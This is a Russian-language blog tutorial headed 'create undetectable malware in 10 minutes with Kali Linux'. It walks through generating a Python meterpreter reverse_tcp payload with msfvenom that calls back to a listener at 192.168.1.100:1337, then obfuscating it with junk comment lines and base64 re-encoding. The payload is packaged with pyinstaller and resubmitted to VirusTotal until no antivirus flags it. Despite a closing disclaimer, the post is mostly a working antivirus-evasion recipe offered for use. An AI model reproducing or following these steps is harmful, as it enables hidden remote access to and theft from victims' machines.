Создайте незаметное вредоносное ПО за 10 минут с помощью Kali Linux — Information Security Squad

Создайте незаметное вредоносное ПО за 10 минут с помощью Kali Linux

Компании AV ежедневно участвуют в битве с киберпреступниками и хакерами, эти участники угроз будут пытаться использовать каждый возможный метод для достижения своей цели.

В этом уроке я расскажу вам, как можно создать оболочку VNC-счетчика, которая будет обходить все антивирусные компании, перечисленные на VirusTotal.com.

Вам необходимо установить:

  • Kali linux

Начало

Запустите свою операционную систему Kali Linux и обновите ее до последней версии, используя команды «sudo apt-get update и sudo apt-get upgrade».

Теперь, когда вы обновили среду Kali Linux, мы создадим папку на рабочем столе под названием malware_cwz.

Вы можете сделать это, выполнив следующую команду на рабочем столе терминала:

 # mkdir malware_cwz 

После того как каталог создан, перейдите в него:

 # cd malware_cwz  

Теперь начинается забава, мы собираемся создавать вредоносное ПО с помощью meterpreter:

 # msfvenom -p python / meterpreter / reverse_tcp LHOST = 192.168.1.100 LPORT = 1337 R> encoded.py 

Затем мы декодируем закодированную оболочку:

Откройте ‘encoded.py’ и скопируйте значение, которое вы можете найти в первом («till the nex»).

Значения должны быть похожи на случайные символы.

#  echo RANDOMVALUE | base64 --decode >> decoded.py 

Теперь, когда значения были декодированы, мы собираемся отредактировать файл decoded.py.

введите в терминале следующее:

введите в терминале следующее:

 # nano decoded.py 

Теперь мы добавим случайный текст в каждую строку в файле, убедитесь, что текст содержит значение # в начале.

lineofcode
#randomtext
lineofcode
#randomtext
lineofcode

Теперь нам нужно снова закодировать его, сделать это с помощью одного и того же инструмента «base64» и скопировать закодированную строку в одно и то же место с именем «encoded.py».

Теперь, когда encoded.py полностью вооружен, мы можем создать из него исполняемый файл:

 # pyinstaller encoded.py 

Затем файл сохраняется в каталоге /root/dist/nameofyourfile/.

Загрузите файл на virustotal.com и повторите этот процесс, пока он не будет найден ни одной компанией AV.

¯\_(ツ)_/¯

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

cryptoparty

Cryptography is typically bypassed, not penetrated.

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

5e7fa976b0640d40